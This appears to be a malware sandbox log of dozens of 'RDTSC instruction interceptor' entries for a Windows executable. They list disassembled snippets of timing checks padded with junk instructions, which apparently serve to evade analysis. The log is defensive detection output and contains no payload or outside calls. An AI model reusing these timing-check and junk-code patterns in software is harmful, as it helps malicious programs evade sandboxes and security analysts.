Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C327 second address: 63C333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63C333 second address: 63C337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63DA9D second address: 63DAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63DAA1 second address: 63DABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB45h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6428E1 second address: 6428E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6428E7 second address: 6428FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FA6C4C2AB36h 0x0000000d jbe 00007FA6C4C2AB36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6428FA second address: 642917 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642917 second address: 642950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FA6C4C2AB44h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642950 second address: 642956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642A64 second address: 642A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642A6B second address: 642A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642A72 second address: 642A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 643605 second address: 643624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007FA6C4D39094h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 643624 second address: 643628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 643628 second address: 643634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 644443 second address: 644487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA6C4C2AB49h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6C4C2AB3Fh 0x00000011 jmp 00007FA6C4C2AB45h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 644487 second address: 64448B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64448B second address: 6444AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB46h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C4AD second address: 64C4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA6C4D39095h 0x0000000b jmp 00007FA6C4D3908Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6C4D3908Ch 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C64F second address: 64C660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB3Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C660 second address: 64C66F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FA6C4D39086h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C901 second address: 64C91C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA6C4C2AB41h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CF2E second address: 64CF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6526B7 second address: 6526CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FA6C4C2AB36h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6526CE second address: 6526D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652B15 second address: 652B4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FA6C4C2AB38h 0x00000012 pushad 0x00000013 jmp 00007FA6C4C2AB3Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6C4C2AB3Eh 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652B4B second address: 652B70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Dh 0x00000007 jmp 00007FA6C4D3908Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FA6C4D39086h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652CC8 second address: 652CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA6C4C2AB36h 0x0000000a jmp 00007FA6C4C2AB41h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652CE3 second address: 652CE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530B7 second address: 6530BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530BB second address: 6530DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA6C4D3909Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530DD second address: 6530F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB3Eh 0x00000009 jnc 00007FA6C4C2AB36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6530F5 second address: 6530F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65428E second address: 654292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654292 second address: 654298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654298 second address: 6542A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 652227 second address: 65222B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65222B second address: 65222F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65222F second address: 652248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B478 second address: 65B47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B47C second address: 65B482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B482 second address: 65B489 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AEDD second address: 65AEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AEE1 second address: 65AEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B079 second address: 65B081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B081 second address: 65B086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B086 second address: 65B0A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D3908Eh 0x00000008 jns 00007FA6C4D39086h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FA6C4D3908Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B0A7 second address: 65B0AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B0AB second address: 65B0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B1E7 second address: 65B1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA6C4C2AB36h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B1F4 second address: 65B1FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B1FB second address: 65B203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D93F second address: 65D945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D945 second address: 65D94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D94C second address: 65D951 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D951 second address: 65D95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65D95E second address: 65D973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FA6C4D39086h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66798A second address: 667994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 667514 second address: 667531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4D39094h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 667531 second address: 667535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 667535 second address: 667541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6676BE second address: 6676C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6676C2 second address: 6676C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B685 second address: 66B690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B690 second address: 66B694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B818 second address: 66B81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B81C second address: 66B83F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FA6C4D39086h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B83F second address: 66B849 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4C2AB36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671FFD second address: 67201F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4D39094h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6F34 second address: 5A6F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6F4E second address: 5A6F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA6C4D3908Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FA6C4D39091h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jnp 00007FA6C4D39086h 0x0000001f jmp 00007FA6C4D39098h 0x00000024 popad 0x00000025 push edi 0x00000026 pushad 0x00000027 popad 0x00000028 pop edi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68398A second address: 68399E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA6C4C2AB3Ch 0x0000000e jbe 00007FA6C4C2AB36h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68399E second address: 6839A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6839A4 second address: 6839AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA6C4C2AB36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6839AE second address: 6839B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682388 second address: 682394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA6C4C2AB36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682394 second address: 68239D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68239D second address: 6823A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6824E8 second address: 682506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4D39091h 0x0000000c jns 00007FA6C4D39086h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682828 second address: 682830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682B33 second address: 682B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682B37 second address: 682B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA6C4C2AB47h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 682B58 second address: 682B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68624E second address: 686258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA6C4C2AB36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687BC5 second address: 687BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687BDD second address: 687BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 687BE7 second address: 687BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F2E second address: 691F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Dh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F40 second address: 691F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F46 second address: 691F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691F4A second address: 691F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007FA6C4D39086h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69ADCA second address: 69ADE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA6C4C2AB41h 0x0000000a jo 00007FA6C4C2AB42h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69ADE8 second address: 69ADEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69D0A6 second address: 69D0AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69D0AA second address: 69D0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69D0B6 second address: 69D0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AA2AC second address: 6AA2BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AA2BD second address: 6AA2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C0AAE second address: 6C0AD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Ch 0x00000007 jmp 00007FA6C4D3908Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f ja 00007FA6C4D39086h 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C0AD4 second address: 6C0ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C0ADF second address: 6C0AE9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4D39086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BFF33 second address: 6BFF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
